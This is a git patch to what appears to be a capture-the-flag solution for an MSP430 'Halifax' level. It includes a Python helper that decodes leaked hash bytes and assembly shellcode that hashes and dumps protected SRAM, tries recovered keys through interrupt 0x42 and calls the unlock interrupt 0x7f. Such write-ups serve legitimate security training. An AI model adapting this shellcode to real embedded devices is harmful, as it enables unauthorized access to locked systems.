From 65153756943bfe0b39de477d08dfdbd2822040c7 Mon Sep 17 00:00:00 2001 From: Val Date: Tue, 4 Jul 2023 19:23:11 -0500 Subject: [PATCH] 25-Halifax: Fix typo in script, update payload for clarity and INT 0x42 --- 25-Halifax/halifax.py | 2 +- 25-Halifax/shellcode.asm | 76 +++++++++++++++------------------------- 2 files changed, 30 insertions(+), 48 deletions(-) diff --git a/25-Halifax/halifax.py b/25-Halifax/halifax.py index 62b367a..bcdb08f 100644 --- a/25-Halifax/halifax.py +++ b/25-Halifax/halifax.py @@ -50,7 +50,7 @@ def main(): key = target[loc:loc+depth] try: value = all_hashes[key] - print(f"{value:x}", end="") + print(f"{value:02x}", end="") except KeyError: value = 0x00 diff --git a/25-Halifax/shellcode.asm b/25-Halifax/shellcode.asm index e4179e0..60dcc1d 100644 --- a/25-Halifax/shellcode.asm +++ b/25-Halifax/shellcode.asm @@ -5,9 +5,9 @@ const: .define msize 0x1 ; length of each hash in bytes .define hsize 0x3 ; bytes kept per hash (only needs to be 3 to determine 1 byte of sram) -.define slen 0x140 ; number of bytes in sram to dump -.define olen 0x3c0 ; number of bytes in hash array -.define oaddr 0x7000 ; address of the big hash array +.define sr_len 0x140 ; number of bytes in sram to dump +.define ha_len 0x3c0 ; number of bytes in hash array (hsize * sr_len) +.define haddr 0x7000 ; address of the big hash array .define iaddr 0x8000 ; address of the sram input buffer .define kaddr 0x9000 ; address of the key buffer external_data: @@ -23,37 +23,27 @@ external_func: .define puts #0x4586 ; memcpy(void *dest, void *src, size_t len) .define memcpy #0x45a4 -; sha256_internal(void * sram_addr, size_t sram_len, void * sha_buf) +; sha256_internal(void * sram_addr, size_t sr_len, void * sha_buf) .define sha256_internal #0x45b6 ; memset(void* buf, char value, size_t length) .define memset #0x45c8 -setup_variables: -push r4 -push r5 -push r6 -push r7 -mov #msize, r4 ; message_size -mov #hsize, r5 ; bytes_per_hash -mov #slen, r6 ; sram_length -mov #olen, r7 ; output_length - get_sram_hashes: clr r11 ; loop variable in r11 -mov r4, r14 ; r14 = 1 -mov #oaddr, r13 ; set destination to 0x8000 +mov #msize, r14 ; r14 = 1 +mov #haddr, r13 ; set destination to 0x8000 sr_loop: mov r11, r15 ; mov addr r15 call sha256_internal; -add r5, r13 ; keep 3 bytes of the output +add #hsize, r13 ; keep 3 bytes of the output inc r11 ; inc r11 -cmp r6, r11 ; do that 0x1000 times +cmp #sr_len, r11 ; do that 0x1000 times jnc sr_loop print_hex: clr r11; ph_loop: -mov.b oaddr(r11), r14 +mov.b haddr(r11), r14 mov.b r14, r15 rra r15 ; using rra here instead of rra.b means the value won't roll into the highest bit rra r15 ; which negates the need to and 0xf, r15 @@ -66,7 +56,7 @@ call putchar ; mov.b HEX_LUT(r14), r15 call putchar ; inc r11 ; inc r11 -cmp r7, r11 ; do that sram_length*3 times +cmp #ha_len, r11 ; do that sram_length*3 times jnc ph_loop mov.b #0xa, r15 ; '\n' @@ -75,43 +65,35 @@ call #0x4578 ; putchar ('\n') take_input: ; 3e4040003f400090b0126845 -mov r6, r14 +mov #sr_len, r14 mov #iaddr, r15 call getsn ; check_all_passwords: -;for i in 0..slen: -clr r9 +;for i in 0..sr_len: +clr r9 pw_loop: -; memset(kaddr, 0, 0x20) -mov #20, r13 -clr r14 -mov #kaddr, r15 -call memset - ; memcpy(kaddr, iaddr + i, len) -mov #10, r13 -mov #iaddr, r14 -add r9, r14 -mov #kaddr, r15 -call memcpy -; sha256_internal(s_addr, len, kaddr) -mov #kaddr, r13 ; set buffer to 0x9000 -mov #0x0010, r14 ; set length to 0x10 -mov r9, r15 -call sha256_internal +mov #10, r13 +mov #iaddr, r14 +add r9, r14 +mov #kaddr, r15 +call memcpy +; INT (0x42, key) +push #kaddr +push #42 +call INT +add #4, sp ; INT(7f) unlock7f: -mov #0x7f, r15 +push #0 +push #0 +push #7f call INT - +add #6, sp inc r9 -cmp r6, r9 +cmp #sr_len, r9 jl pw_loop -teardown_variables: -pop r7 -pop r6 -pop r5 -pop r4 +end: ret